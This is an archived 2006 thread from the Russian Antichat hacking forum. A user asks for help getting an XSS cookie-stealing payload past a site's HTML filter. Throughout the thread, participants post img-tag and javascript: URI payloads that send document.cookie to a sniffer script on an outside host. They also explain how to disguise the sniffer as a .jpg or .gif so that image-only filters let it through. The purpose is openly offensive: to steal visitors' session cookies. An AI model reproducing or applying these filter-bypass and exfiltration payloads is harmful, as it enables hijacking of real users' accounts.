Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Обойти фильтрацию! (https://forum.antichat.xyz/showthread.php?t=13752)

Utochka 31.01.2006 17:51

Обойти фильтрацию!
 
Подскажите как обойти следующую фильтрацию:

До фильтрации:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

или
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

После фильтрации:

<img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

Как бы это обойти?

max_pain89 31.01.2006 19:18

мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie

Electro 31.01.2006 19:43

Цитата:

Сообщение от NeX
Подскажите как обойти следующую фильтрацию?

Мдя....эт точно!

Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что??
Цитата:

<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>
расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (

pch 31.01.2006 21:39

Попробуй
Код:

<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

Utochka 01.02.2006 14:39

Цитата:

Сообщение от pch
Попробуй
Код:

<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

че то не сработало =( Дай свою асю, поговорить надо.

Xxor 01.02.2006 14:49

Юзай античатовский снифер он с расшырением .gif должно пропустить

Utochka 02.02.2006 11:33

Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;ht tp://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!


Время: 22:16